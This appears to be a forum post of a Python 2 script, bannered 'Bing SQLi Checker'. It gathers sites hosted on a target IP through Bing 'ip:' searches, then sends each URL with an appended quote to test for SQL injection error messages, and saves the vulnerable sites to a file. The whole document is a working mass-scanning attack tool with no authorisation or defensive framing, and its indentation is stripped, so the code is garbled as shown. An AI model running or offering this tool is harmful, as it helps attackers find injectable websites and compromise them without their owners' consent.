Code:
#!/usr/bin/env python
import urllib
import urllib2
import re, sys
import os, cookielib
import threading
import time
from IPy import IP # pip install IPy
# This script runs only n PHP websites
# Only Error Base SQL Injection are found
def screen():
if os.name == "nt":
os.system('cls')
else:
os.system('clear')
screen()
banner = '''
____ _ ____ ___ _ _ ____ _ _
| __ )(_)_ __ __ _ / ___| / _ \| | (_) / ___| |__ ___ ___| | _____ _ __
| _ \| | '_ \ / _` | \___ \| | | | | | | | | | '_ \ / _ \/ __| |/ / _ \ '__|
| |_) | | | | | (_| | ___) | |_| | |___| | | |___| | | | __/ (__| < __/ |
|____/|_|_| |_|\__, | |____/ \__\_\_____|_| \____|_| |_|\___|\___|_|\_\___|_| v1.0
|___/
URL: http://blackcoder.info
'''
print banner
try:
ip = raw_input("Enter Target IP: ")
host = IP(ip)
except:
print ""
print "Enter Only IP-Address"
print ""
sys.exit()
def main():
try:
next = 1
while(next<=200):
bing = "http://www.bing.com/search?q=ip%3A"+ip+"+"+"id=&go=Submit&qs=n&form=QBLH&pq="+"ip%3A"+"wordpress"+"&first="+str(next)+"&FORM=PORE"
next = next + 10
data = urllib2.Request(bing)
bf = urllib2.urlopen(data).read()
find = re.findall('<h2><a href="\S+', bf)
for b in find:
m = b.replace('<h2><a href="http://', "").replace('<h2><a href="', "")
if 'id=' in m:
QL = m.replace('"', "").replace('amp;', "")
with open('x.txt', 'a') as f:
f.write(QL)
f.write("\n")
st = open("x.txt" , 'r').read().splitlines()
lines = set(st)
count = 0
for line in lines:
with open('sqlsites.txt', 'a') as sql:
count = count + 1
sql.write(line)
sql.write("\n")
print ""
print "Total Sites: " + str(count)
os.unlink("x.txt")
except Exception, e:
print e
main()
error = ["DB Error","SQL syntax;","mysql_fetch_assoc","mysql_fetch_array","mysql_num_rows","is_writable","mysql_result","pg_exec","mysql_result","mysql_num_rows","mysql_query","pg_query","System Error","io_error","privilege_not_granted","getimagesize","preg_match",]
def sqli(f,opener):
try:
for s in error:
URL = "http://"+f+"'"
sqli = urllib2.Request(URL)
conn = opener.open(sqli).read()
if s in conn:
SQLI = URL.replace("'", "")
print URL.replace("'", "")
break
with open("SQLI.txt", 'a') as char:
char.write(SQLI)
char.write("\n")
except Exception, e:
pass
#print e
threads = []
files = open('sqlsites.txt', 'r').read().splitlines()
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
print "-" * 30
print "SQL-INJECTION SITES "
print "-" * 30
for f in files:
t = threading.Thread(target=sqli, args=(f,opener))
t.start()
threads.append(t)
time.sleep(0.3)
for j in threads:
j.join()
os.unlink('sqlsites.txt')
print ""
print "Coded By Ne0-h4ck3r"
print ""